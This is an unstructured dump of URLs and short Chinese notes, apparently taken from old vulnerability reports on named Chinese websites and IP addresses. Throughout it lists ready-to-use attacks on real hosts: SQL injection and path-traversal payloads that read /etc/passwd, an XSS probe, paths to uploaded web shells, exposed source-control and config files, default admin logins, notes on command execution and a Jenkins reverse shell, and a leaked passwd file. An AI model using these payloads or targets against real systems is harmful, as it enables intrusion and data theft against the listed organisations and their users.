http://**.**.**.**/ucoa/weixin/weixin_set.aspx?userOpenId=oFYhduFPPN95g658RLeT9L7SQmO4 http://tc.changhong.com/search.aspx?key=1 http://www.huajinsc.cn/postsystem http://mall.998.com/passport-login.html商城登录接口,有验证码限制 http://vpn.ppm.cn/ http://**.**.**.**/bugs/wooyun-2010-089595 http://**.**.**.**/ http://**.**.**.**//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER 
url:http://**.**.**.**/Shop/product.html?can[0]=90 http://**.**.**.**:8001/phrs/Society/SocietyMain.html http://member.360hitao.com https://**.**.**.** https://**.**.**.**/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B http://**.**.**.**/chinese-hk/serviced-apartments/?area=1&districts[]=95&rent_min=&rent_max=&size_min=&size_max=&keyword=&search=%E6%90%9C%E5%B0%8B http://221.8.57.106/ http://**.**.**.**/office http://**.**.**.**/WorldClient.dll?View=Logout http://**.**.**.**/HumanResources/SearchJob.aspx http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://tc.changhong.com/certs/detail.aspx?id=1 http://t.cn/RUUNjzh http://antirez.com/news/96 http://www.huozhan.com/SupplierMessageAction_showSupplierBasicMessage.do?supplercode=010005 http://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin(参数xsRealName存在注入) http://admin.pay.weibo.com/admin/index.php http://boss.idccun.com/ http://www.baixingbao518.com http://crm.midea.com.cn/downexcel/ http://wma.ejoy.sinopec.com/wma//htmlLogin/o2oOneCoupons.action redirect:http://www.baidu.com http://**.**.**.**/ http://api.110monitor.com/CrossDomainProxy?1=1&_workId=1447203777417-44251&UPYOO_TOKEN=e748b630-2e0a-485d-8c04-xxxxx&_url=http://api.110monitor.com/ucid//app/user?1=1&key=1&_search=false&nd=1447203777418&rows=20&page=1&sidx=&sord=asc http://**.**.**.** http://**.**.**.**/case_class.asp?id=2&Menu=ChildMenu1 http://**.**.**.**:8001/phrs/Society/SocietyMain.html http://**.**.**.**:8001/phrs/fileupload.jsp http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/bea/user_projects/domains/hrrs/Attachment/null/01.jpg http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/etc/passwd 
http://**.**.**.**:8001/phrs/servlet/downloadServlet?filename=/etc/hosts http://www.mangocity.com/mangob2b/loginOperateAciton!loginMethod.action http://**.**.**.**/sygl/default.asp http://**.**.**.**/Self/CheckCity.aspx?province= http://www.openfind.com/taiwan/casestudy.php?id=1996 http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/up.aspx http://jp.ch.com/jp.ch.com.zip http://**.**.**.**/register.jspx http://**.**.**.** http://**.**.**.** http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39 http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null http://**.**.**.**/pages.asp?id=56 http://**.**.**.**/guoji/Admin_Index.asp http://www.dianxiaoyi.com/ http://**.**.**.**/点击图中标识链接 http://info.315.com.cn:80/ http://www.haodai.com/zixun/k_1*/ act.wildstar.ztgame.com/news_comment/get.php?id=&type=evolve04 http://www.agehui.cn/ http://njumaths.nju.edu.cn/oa/main/menupage/viewmenu.jsp?txt_type2=10 http://njumaths.nju.edu.cn/oa/main/menupage/viewmenu.jsp?txt_type2=10 http://www.51zxw.net/gp_buy.aspx?pid=526 http://218.249.220.18/ http://www.sinochemjiangsu.com/login.aspx http://fenxiao.lvmama.com/ http://fenxiao.lvmama.com/getpass.jsp处,通过输入正确的手机号码泄露用户名; http://fenxiao.lvmama.com/b2b/prod_list.jsp,说明进行了过滤。经过试验,发现“/”除号没进行过滤,除号下if语句进行了过滤,"case http://vip.zjqq.mobi/index.php/vote/voteList?id=271 port:6379 http://antirez.com/news/96 http://cx.saicmotor.com/uc_server/ http://www.colourlife.com/community?name=* http://li.yonyou.com/test.aspx http://h.yonyou.com/ http://hr.yonyou.com/ http://q.yonyou.com/ http://1.202.242.116/ECHT/ http://jwc.nau.edu.cn/ http://sso.nau.edu.cn/sso/login?service=http%3A%2F%2Fims.nau.edu.cn%2F http://ims.nau.edu.cn/findpassword 
http://**.**.**.**/Policeinterface/user!register.action http://**.**.**.**/Policeserver/download/download_icon.png http://**.**.**.**/Policeinterface/shell.jsp http://**.**.**.**/Policeinterface/caa1.jsp http://**.**.**.**/FlowRedPacket!sendFlowRedPacket.action http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket.action&password=123456&chk=&loginType=0&chkType=on http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket!sendFlowRedPacket.action?packetAmount%3d1%26sendFlowValue%3d1%26mobile%3d18600827452%26captcha_sj%3d123456&password=123456&chk=&loginType=0&chkType=on http://t.**.**.**.**/cu0afe),还是利用到了backurl http://t.**.**.**.**/xCT7dh http://t.**.**.**.**/qHDsvb http://t.**.**.**.**/dj7Z2m http://t.**.**.**.**/bxByy0 http://t.**.**.**.**/ZELNPs http://t.**.**.**.**/Uo1PKS http://t.**.**.**.**/QFHJqP http://t.**.**.**.**/QCwmof http://t.**.**.**.**/Q5BGfA http://t.**.**.**.**/Q0QwZd http://t.**.**.**.**/Pcl18r http://t.**.**.**.**/NC2RVd http://t.**.**.**.**/KNxPLW http://t.**.**.**.**/KLUVwD http://t.**.**.**.**/HekWzz http://t.**.**.**.**/G0Qjqc http://t.**.**.**.**/9OV0Mw http://t.**.**.**.**/83RNLi http://t.**.**.**.**/5XV5vT http://t.**.**.**.**/2F8kqZ http://**.**.**.**/bugs/wooyun-2014-076547 http://180.153.223.220/seeyon/ http://180.153.223.220/seeyon/logs/ctp.log http://180.153.223.220/seeyon/logs/uc.log http://**.**.**.**/Person/grfjsc/u.asp http://**.**.**.**/login!findRoleByUserlogin.action存在命令执行漏洞 http://**.**.**.**/common/adminLogin.action http://**.**.**.**/one8.jsp http://**.**.**.**/member/member.php?channelid=27&username=a http://**.**.**.**/uploadfile/bk.tar.gz http://**.**.**.**/sys/sys_tbl_destroy.php、http://**.**.**.**/bo.php等等~~ http://member.99114.com/view/findpassword/passwordForm.jsp?siteId=1 http://**.**.**.**/ http://**.**.**.**/buildinginfo.php?id=863 http://www.darryring.com/nAPI/AddressInfo.ashx?action=getbyid&id=81691 http://www.zrtg.com http://122.225.200.174/ 
http://**.**.**.**/swjsyjzx/admin_aspcms/login.asp shell:http://**.**.**.**/Skins/root.asp http://www.xjair.com http://www.xjair.com/articlelist.aspx?lmid=201111241132339582 http://www.xjair.com/article.aspx?id=201511021252236147 http://www.xjair.com/article.aspx?id=201510281636048110 http://www.xjair.com/article.aspx?id=201510221417206230 http://www.xjair.com/article.aspx?id=201510221416398861 http://www.xjair.com/article.aspx?id=201509101129137719 http://www.xjair.com/article.aspx?id=201509101125387361 http://www.xjair.com/article.aspx?id=201509101125387361 http://sso.me.csair.com/rs-bin/rightsite.dll/vsi3.htm http://e.tpyzq.com/login/Login.jsp?logintype=1 www.fengniao.com http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/zgh/socialAdmin/ http://**.**.**.**/jyxc.asp?id=4036 http://**.**.**.**/jyxc.asp?id=4036” http://gm.gome.com.cn/Admin http://www.ownar.com/member.php?id=24 http://**.**.**.**/qiuchang.php?id=27 http://**.**.**.**/curriculum_show.aspx?id=141 http://**.**.**.**/newsinfo.asp?flowNo=1213 http://**.**.**.**/admin/login.asp http://**.**.**.**/ http://appservice.lenovomm.com/cacti/ http://124.248.34.227/detail.html?pid=10077208 http://**.**.**.**/club/m_detail.aspx?id= http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81 http://**.**.**.**/sys_msg/msgsh.aspx?con=%E9%85%8D%E9%80%81%E7%89%A9%E6%B5%81 http://**.**.**.**/hc_view.asp?catid=88 http://**.**.**.**/page_view.asp?catid=150&N_types=1 http://**.**.**.**/page2.asp?catid=122&N_types=1 http://**.**.**.**/zt1a2_view.asp?id=78&M_id=6 http://**.**.**.**/page2_view.asp?N_id=259&N_types=4&catid=140 http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712 http://**.**.**.**/demolab/phpBB/viewtopic.php?topic=23712 http://**.**.**.**/case_enterprise.html http://**.**.**.**/case_college.html http://**.**.**.**/case_government.html http://**.**.**.**/ http://www.emaotai.cn:90/zyd/ 
www.emaotai.cn:90/zyd/Member/JlrList.aspx?khbh=20130523000007 http://**.**.**.**/store/FTP_Accounts.txt http://api.fengniao.com/app_ipad/news_list.php http://interactive.huanqiu.com/.svn/entries http://api.huanqiu.com/info.php来送温暖了 http://**.**.**.**/bugs/wooyun-2015-0132163 http://**.**.**.**/oa/ http://**.**.**.**/oa/indexlist.aspx?type= http://**.**.**.**/ http://**.**.**.**/product.asp?proId=35 http://**.**.**.**/findgov http://**.**.**.**/findgov http://mobile.ztgame.com/mobile/index.php https://mobile.ztgame.com http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7 http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://**.**.**.**:8099 http://admin.ixingmei.com/index.php?r=site/index http://q.yoger.com.cn/diaryinfo.php?did=86&uid=200782 http://q.yoger.com.cn/diaryinfo.php?did=5501&uid=16262365 https://112.124.211.176/.git/ http://**.**.**.**/pages/portal/index.jsp www.woshidai.com http://**.**.**.**:9111 http://**.**.**.**/WebLoginAction.do?cmd=logout http://mcti.xmu.edu.cn:80/records_player.php?id=1 http://mcti.xmu.edu.cn:80/teacher_info.php?id=2 http://mcti.xmu.edu.cn:80/news_browser.php?id=1 http://mcti.xmu.edu.cn:80/ http://www.emaotai.cn:90/zyd/LoginTo.aspx http://www.emaotai.cn:90/zyd/Config/SpjgEdit.aspx?spbh=696&Op=&ReturnPage=~/Config/SpjgList.aspx http://www.emaotai.cn:90/zyd/Config/SpEdit.aspx?spbh=696 http://www.nuoxinvc.com/ www.nuoxinvc.com http://**.**.**.**/page/info.jsp?id=111536 http://**.**.**.**/group_Iframe.asp?id=5 http://tams.youxinpai.com/,如图所示: http://tams.youxinpai.com http://caig.homelink.com.cn/ http://91up.com/权限控制不严,是否付费只靠前端JS控制,通过http抓包分析可获取大量收费课程地址。 http://118.112.186.175:2222/ http://118.112.186.175:2222/super/index.php?c=welcome&m=index http://118.112.186.175:2222/super/index.php?c=mail_show&m=show_email&id=44581 
http://118.112.186.175:2222/super/index.php?c=mail_show&m=download_attachments&attachments_id=3215 http://118.112.186.175:2222/super/index.php?c=my_equipment&m=index http://**.**.**.**/download.aspx?cat_code=Head http://**.**.**.**:8080/cgi-bin/test-cgi http://**.**.**.**:8080/cgi-bin/test-cgi http://mail.**.**.**.** http://**.**.**.**/bugs/wooyun-2014-076547 http://ctags.sourceforge.net http://3g.game.letv.com/zabbix/ http://p.game.letv.com/zabbix/ http://**.**.**.** http://www.open.com.cn/usercenter/feedback.html http://file.mt.sogou.com/admin.html http://ysj.medlive.cn/ http://cheer.medlive.cn/ http://case.medlive.cn/ http://stat.medlive.cn/login.do http://info.tcl.com/ https://**.**.**.**/account/password_reset.tmpl?PASSWORD=mp4ybNy&EMAIL_ADDRESS=XXX http://wx.zhcw.com/port/get_video.jsp?keywords=111&random=0.6499213096685708 http://ehome.zte.com.cn/index.php?app=goods&id=1829/*!AND*/1=1 http://ehome.zte.com.cn/index.php?app=search&cate_id=164/*!AND*/1=1 http://ehome.zte.com.cn/index.php?app=goods&id=1829/*!AND*/1=2 http://ehome.zte.com.cn/index.php?app=search&cate_id=164/*!AND*/1=2 http://ehome.zte.com.cn/index.php?app=goods&id=1829 http://tc.changhong.com/inspection/jc.aspx?type=1111 http://tc.changhong.com/inspection/inspect3.aspx?id=11 http://univ1.zte.com.cn/XsExam/Application/ExamManager/ShowExam_Paper.aspx?seqno=2888579&status=5&ExamId=113167&PaperId=52325&StudentId=20060900063376&ExamName=%E5%85%A8%E5%91%98QCC%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E5%9F%B9%E8%AE%AD%E8%80%83%E8%AF%95&StudentName=%E8%93%9D%E5%86%AC%E8%8B%B1 http://mail.damai.cn http://**.**.**.**/wscx/ http://**.**.**.**/jiaoshizhaopin/liaoning/chaoyangjiaoshizhaopinwan/2014-0825-22505.html http://**.**.**.**/tic_sstf_site/QueryCont_siteSearchList.action?siteId=402882db4a610351014a610351e90000&cateId=all&queryKeyword=1 
http://**.**.**.**:807/TicketBook/TicketPaySend.aspx?lb_bookNo=942562&lb_Date=2015-11-14%E3%80%8007%3a30&lb_OwnerStation=%E5%9F%8E%E8%A5%BF%E5%AE%A2%E8%BF%90%E7%AB%99&lb_ArriveName=%E9%BA%9F%E6%B8%B8&lb_TicketPrice=38.50&lb_sumPrice=11.5000&lb_StFee=3.0000&lb_Optime=2015-11-13+11%3a39%3a49&lb_sumPageNum=1&lb_BaoXianTypeName=%E4%B9%98%E8%BD%A6%E6%84%8F%E5%A4%96%E9%99%A9&lb_BaoXianCompName=%E9%99%95%E8%A5%BF%E6%B3%B0%E5%BA%B7%E5%85%BB%E8%80%81&lb_BaoXianInfos=%E5%89%8C%E6%96%B9%E5%9C%86%2c18192351965%2c610329198905081159%2c0%2c1%2c0&lb_BaoXianFreeMSG=%E4%B8%8D%E8%B5%A0%E9%80%81%E5%85%B6%E5%AE%83%E4%BF%9D%E9%99%A9&lb_BaoXianFee=0.0000&lb_BaoXiancount=1&lb_FreeMSG=%E6%97%A0%E4%BC%98%E6%83%A0%E6%B4%BB%E5%8A%A8&lb_Discountprice=0.0000&lb_FreeTypeID=0&lb_FreeBaoXianType=0&lb_Contact=%E5%89%8C%E6%96%B9%E5%9C%86&lb_tel=181923519xx&lb_idcard=xxx http://mba.xmu.edu.cn:80/account/get_email?email=-1 http://**.**.**.**/test.php http://space.qian88.com.cn/space.php?uid=272104&do=wall&view=me http://**.**.**.**/sydwzk/exam/PaperNoPrint.jsp?memberid=51350 http://**.**.**.**/sydwzk/exam/PaperNoPrint.jsp?memberid=51350 com:6379 http://**.**.**.** http://**.**.**.**:89 http://**.**.**.**/searcher.aspx?id=a http://ydm.iyuedan.com/manage/ http://www.fangte.com/ticket/ http://**.**.**.**/cms/jsp/culture/CULPINFO_selectall.jsp?pageno=1 http://**.**.**.**/ http://222.22.255.106:8089/ggjs/zdzx/dztj.jsp?servertype=&&kzh=smk0181177 http://**.**.**.**/tools/.svn/entries http://**.**.**.**/tools/test.xml http://woodscience.csuft.edu.cn/hudong/Topic.aspx?id=4 http://mba.fenxi.com/index.php?r=user/setup/sites https://github.com/callmebmf/crc360.cn/blob/53c8ddc4f0dca51757599f624ae2fca913b0332e/app/config/mail.php http://**.**.**.**/vsadmin/ctrl/member/members.php http://**.**.**.**/vsadmin/ctrl/member/member-edit.php?seller=&&uid=91&&type=pf http://**.**.**.**:81/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 
http://**.**.**.**:81/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:81/weaver/weaver.email.FileDownloadLocation?fileid=1*&download=1 http://**.**.**.**:8012/userlist.php http://**.**.**.**/fagui_cont.asp?news_id=15711 http://**.**.**.**/fagui_cont.asp?news_id=15711 http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq http://**.**.**.**/Topic/Show.aspx?id=135641&tid=208 http://**.**.**.**/Topic/Show.aspx?id=135641&tid=208 http://supports.jiaju.sina.com.cn/manage/index.php?mod=login&act=show http://supports.jiaju.sina.com.cn/manage/index.php?mod=feedback&act=reply&status=1 http://go.sogou.com/hotel/WEB-INF/web.xml http://go.sogou.com/zt/WEB-INF/web.xml http://go.sogou.com/tejia/WEB-INF/web.xml http://go.sogou.com/plane/WEB-INF/web.xml http://admin.yixun5866.com/admlogin.aspx,这个是管理后台。 http://**.**.**.**/general/vmeet/wbUpload.php?fileName=test.php+ http://**.**.**.**/general/vmeet/wbUpload/test.php http://jpkc.nwpu.edu.cn/jp2005/02/wljx/wlkc/12345.files/lyb/index.asp?action=login http://jpkc.nwpu.edu.cn/jp2007/17/admin/index.asp http://jpkc.nwpu.edu.cn/jp2005/19/jsbks/jsbks_login.asp http://jpkc.nwpu.edu.cn/jp2007/11/admin.asp http://jpkc.nwpu.edu.cn/dzjc/dianzijs/admin.asp http://jpkc.nwpu.edu.cn/jp2005/32/Experiment/sylogin.asp http://jpkc.nwpu.edu.cn/jp2005/16/Exam_left.asp http://jpkc.nwpu.edu.cn/jp2005/32/Exam/zxcp1.asp http://dealer.youxinpai.com/ https://www.wooyun.org/bugs/wooyun-2014-057448 http://www.mafengwo.cn/postal/ticket.php www.mafengwo.cn http://**.**.**.**/manage/contractrecord/lpb1?fwnm=2464411 http://edm.300.cn/ http://news.zrtg.com:8080/exchange/externaldoc/queryExternaldoc.do http://221.8.39.98:5555/Login.aspx http://lib.henannu.edu.cn http://service.cheshi.com/complain/complain_list.php?pid=3 http://service.cheshi.com/complain/complain_list.php?pid=3/**/or http://**.**.**.**/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 
http://**.**.**.**:81/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**/c6/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://**.**.**.**:81/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://mail.faw.com.cn/ http://coog.cnooc.com.cn/oa/output.ashx http://bbs.51credit.com/forum.php?mod=viewthread&tid=2315957 http://www.qian88.com/findLoginPwdFirst.html http://**.**.**.**:80/buynow_where1.asp?lang=en&id=10 http://**.**.**.**/cgi-bin/ip?cmd=logout http://**.**.**.**/search.php?ip=%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://**.**.**.** http://115.159.22.106:8080/ http://oa.tianjimedia.com/ http://oa.tianjimedia.com/yyoa//checkWaitdo.jsp?userID=1 http://i5.tietuku.com/1e5c211d3c5e31b2.png http://i12.tietuku.com/db20af050c4329a9.png https://github.com/cckjs/young_tools/blob/8de3c1c04a5178c8ffe9c6a574833bca3e41ea08/tools-email/src/main/resources/mail.properties https://github.com/hutao1004/yintt/blob/df629119ccf0cf9443cfa35c69eb269bd91aa3de/Webconfig/msgconfig.php http://58.60.63.23/landing.action http://www.g-bos.cn/system/userPurview/toLogin password:123456 http://jx.g-bos.cn/system/userPurview/toLogin username:test password:123456 http://gc.g-bos.cn/system/userPurview/login username:admin password:123456 http://gamemanager.uqee.com/ https://github.com/jklmnlkevin/daxia-jeasyui/blob/f1ac50419bf59d40667cae44fcc257a51d5d1ef8/src/main/resources/mail.properties http://**.**.**.** http://3g.emaotai.cn/ http://www.emaotai.cn/wapshop/Login.aspx?returnUrl=http://www.emaotai.cn/wapshop/MemberCenter.aspx http://**.**.**.** http://**.**.**.** https://github.com/fanzq/nutz_httl/blob/9c1806d5ee5ee84c01b0102a526a9cbee20deb27/nuzt_fan/src/main/resources/custom/mail.properties https://sso.youshang.com/sso/userAuthnAction.do#无限制撞库 http://zone.wooyun.org/content/23905。于是盛大漫游之路开始~首先是其中的一个站点http://qa.act.sdo.com:7000居然存在jenkins这个服务.然后利用反弹的脚本直接就得到了cmdshell 
https://code.google.com/p/studentofficedocs/source/browse/trunk/%E5%AD%A6%E9%99%A2%E7%BE%A4%E5%8F%91%E7%9F%AD%E4%BF%A1%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81.txt?r=9 http://219.232.237.76/zabbix root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin mysql:x:500:501::/home/mysql:/bin/false zabbix:x:501:502::/home/zabbix:/bin/false http://www.culiu.org/.git/config org:shop/culiuorg.git http://xingzuo.chuchujie.com/ 
http://erp.emaotai.cn/b2b/ele-business/salesman/index.asp http://**.**.**.**/) http://xxxx/emap/bitmap/bitMap_delPicFromDisk.action http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=**.**.**.**:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://www.culiu.org/admin/index.php/login/check/time-1446192228-ajax-true http://scm.ttkuaiche.com/tt-scm/page/index.do http://ask.07073.com/search/?q=1 http://**.**.**.**/Service_show.asp?ID=27 http://m.jzjt.com/jzjt.sql http://changba.com/s/VdQUyfuTAw95sGks8pUbjg?&code=Kxhsv6044ik https://**.**.**.**/bugs/wooyun-2015-0152055中影响的这些站登陆之后, http://cmncu.minmetals.com.cn http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html https://github.com/yb989/infcenter/blob/872d63dbd49b54aced249fc0eb9cd20ef24d6ca7/new_infcenter/.svn/pristine/80/8085974cb049d6c9438e59c0a773c321b11e7f08.svn-base https://www.jinxinp2p.com/image.do\?uri\=../../../../../../../../../../etc/passwd http://60.28.205.210/ https://github.com/jsy593/bheticketview/blob/1ee1e2bde964d185fea63f535469f0da2f2d0ed8/src/com/bhe/util/MailBean.java http://www.htsec.com/ChannelHome/index.shtml)存在SQL注入一枚,DBA权限,可拖库。 https://github.com/1649865412/ToolConstant/blob/6508df3210cbb8fc47242a12fd03cf2dafcf0a9b/text/src/mail/EmailDemo.java www.emaotai.cn:90 http://alexa.admin5.com/ftp.zip www.gzklnx.cn http://www.emaotai.cn:90/zyd/ http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2 http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650 http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18 http://**.**.**.**/zc/ http://cp.super8.com.cn/api/region/getlandmarkbymaintypeid?cityCode=-1 http://**.**.**.**/servicehome/kmview.aspx?postid=ZS20131231026 http://**.**.**.**/AppWeb/BuDing/BuDingGJCX.aspx http://www.bocommtrust.com/ http://**.**.**.**/index.asp http://**.**.**.**/upload_flash.asp http://edt.mostgov.cn 
http://**.**.**.**:9090/live/p.do http://**.**.**.**:9090//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd http://e.huanqiu.com/hqad/view?pid=216&cvid=636&mid=78&tag=0 http://baike.baidu.com/link?url=pevH3Xt2XmklC2Uc6Nuk1E85KtWdyI717e6Wy1xEPOd_InJGolfdhNfAXpMJ8mFX9dGY5kpLu9-ddtQRPPyByThSoFgDFS9Gal01-9FaRjG http://**.**.**.**/course_center/index/homepage/preview.jsp?id=df72f4f0-8993-4e65-93b2-888ce142c93a&t=news&0.30376001982949674 www.ledaosw.com http://www.jinmajia.com/WEB-INF/web.xml https://www.wooyun.org/bugs/wooyun-2015-0143209 http://xin.52xinyou.cn/ http://xin.52xinyou.cn/pay-order.html?gid=62485%27 http://c.ctsho.com/ http://c.ctsho.com/is/index.jsp http://mtest.ayibang.com/appointment/?keyword=project_depth_cleaning&city=%E5%8C%97%E4%BA%AC http://360.m.ayibang.com/appointment/?keyword=project_clean_glass&city=%E5%8C%97%E4%BA%AC http://**.**.**.**/modify/login.asp http://www.baojia.com/account/ http://oss.baojia.com/cs/toUpdate/1 http://oss.baojia.com/wechat/toUpdate/3 http://oss.baojia.com/wechat/toUpdateReplies/1 http://123.57.36.48 http://**.**.**.**/bigclass.asp?bigclassid=31 http://**.**.**.**/bigclass.asp?bigclassid=31 http://www.agrite.com.cn/ http://www.agrite.com.cn/plus/mytag_js.php?aid=9090 http://**.**.**.**/modules/info/league/index.php?mid=1 https://www.anpingdai.com/index.php?s=/Admin/User/Login.html username:it-test password:123456 https://www.anpingdai.com/upload/1447822200/1.php http://beijing.zznissan.com.cn/admin/console/?c=login&a=log http://**.**.**.**:9876/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:9876/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:9876/weaver/weaver.email.FileDownloadLocation?fileid=*&download=1 http://**.**.**.**:9876/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 
http://api.mkf.com/api.php?mkfstr=YjVhYjE3ODhhYzA4ODY0ODJlMjdhY2Q2ODZhYjg4Y2NleUp1YjNkd1lXZGxJam9pTVNJc0ltRWlP%0D%0AaUp2Y21SbGNreHBjM1FpTENKdElqb2lUM0prWlhJaWZRPT0NCg==%0D%0A&g=Api2_1_1&os=android&user_id=1**1929 http://www.lib.uestc.edu.cn http://fj.tf56.com/fjSite/hostwebsitecs/invoke?address=1&callback=jQuery17206091691900510341_1447705981678&cmd=selectCarLocationList&emptyload=&faith=&keyword=&nlengthmax=&nlengthmin=&ntonmax=&ntonmin=&pageSize=10&partyid=null&site=&skipCount=0&sort=inputDate&toaddress=&_=1447706033792 http://www.helloan.cn/web/instation/instationInfo.cuc?id=12497111 http://**.**.**.**/Login.aspx http://xmys.zznissan.com.cn/ajax_default_models.php?models= http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976\?redirect:/xxoo http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 redirect:/xxoo=1 http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 redirect:/xxoo=1 http://www.eweidai.com/safe/resetPassword.jsp http://**.**.**.**/visa/detail.jsp?visa_basic_info_id=17 http://**.**.**.**/visa/article.jsp?jspmaker_act_id=101 http://**.**.**.**/visa/article.jsp?jspmaker_act_id=83 http://**.**.**.**/visa/tour_show.jsp?jspmaker_act_id=1027303 http://**.**.**.** http://un.huanqiu.com http://jiyou.11185.cn/ http://jiyou.11185.cn/u/buyertdetail.html?tradeId=9436310&type=tlist http://ilife.homelink.com.cn/aigou eg:10099988 http://**.**.**.**/xwzx/xwxx.asp?id=1770 http://**.**.**.**/ http://111.207.170.84:82/ http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2 https://www.wooyun.org/bugs/wooyun-2015-0153270 http://im.chuchujie.com/mo/signin http://**.**.**.**/aboutus/aboutus.html http://**.**.**.**/product/?cid= http://**.**.**.**/product/?cid=9 http://**.**.**.** http://**.**.**.**/s/index.asp?id=26 http://www.vmovier.com www.vmovier.com http://202.120.197.22/ http://zone.wooyun.org/content/23905 http://www.ebogame.com/user_findpwd.php?t=doquestion 
